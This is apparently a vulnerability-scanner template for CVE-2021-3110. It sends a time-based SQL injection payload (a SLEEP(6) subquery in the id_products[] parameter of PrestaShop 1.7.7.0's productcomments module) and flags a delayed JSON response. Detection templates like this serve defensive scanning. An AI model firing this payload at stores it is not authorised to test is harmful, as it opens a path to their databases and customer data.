id: CVE-2021-3110 info: name: PrestaShop 1.7.7.0 SQL Injection author: Jaimin Gondaliya severity: critical description: | The store system in PrestaShop 1.7.7.0 allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3110 - https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e - https://www.exploit-db.com/exploits/49410 metadata: verified: true tags: cve,cve2021,sqli,prestshop requests: - method: GET path: - "{{BaseURL}}/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt)" matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and